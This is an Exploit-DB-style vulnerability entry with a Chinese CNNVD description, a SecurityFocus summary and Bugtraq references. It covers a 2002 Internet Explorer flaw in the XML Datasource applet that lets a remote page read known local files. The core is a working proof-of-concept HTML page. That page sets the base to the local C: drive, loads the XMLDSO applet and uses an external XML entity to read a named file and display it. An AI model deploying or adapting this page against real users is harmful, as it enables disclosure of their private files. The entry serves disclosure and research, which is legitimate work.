https://www.exploit-db.com/exploits/21721
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200209-049

MicrosoftInternetExplorer是一款微软开发的WEB浏览器，包含XMLDatasourceapplet小程序。MicrosoftInternetExplorer中的XMLDatasourceapplet存在设计问题，远程攻击者可以利用这个漏洞查看系统中任意已知文件名的文件。XMLDatasourceapplet可以按如下方式使用在WEB页上：如上所示，用户不需要指定类从哪个jar或者cab文件获得，所以这个类从指定从本地文件中获得，攻击者可以构建CODEBASE标记指向本地文件()的页面，当其他用户查看这个页面时，可导致指定的系统文件被显示。在知道用户系统中的文件名情况下，攻击者可能以查看用户进程的权限读取系统任意文件内容。

source: http://www.securityfocus.com/bid/5490/info

A problem in Microsoft Internet Explorer could lead to the disclosure of sensitive information.

Due to the design of the datasource applet, it may be possible for a user to view the contents of local files via a remote page. By building a custom-crafted page that specifies the code base as the local system, it would be possible to display the contents of known local files.

<html>
<head>
<base href="file:///C:/">
</head>
<body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
<!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
]>
<file>
&contents;
</file>
</applet>
<script language="javascript">
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>

来源:BUGTRAQ
名称:20020817Internetexplorercanreadlocalfiles
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=102960731805373&w;=2
来源:BID
名称:5490
链接:http://www.securityfocus.com/bid/5490
来源:XF
名称:ie-xml-read-files(9885)
链接:http://www.iss.net/security_center/static/9885.php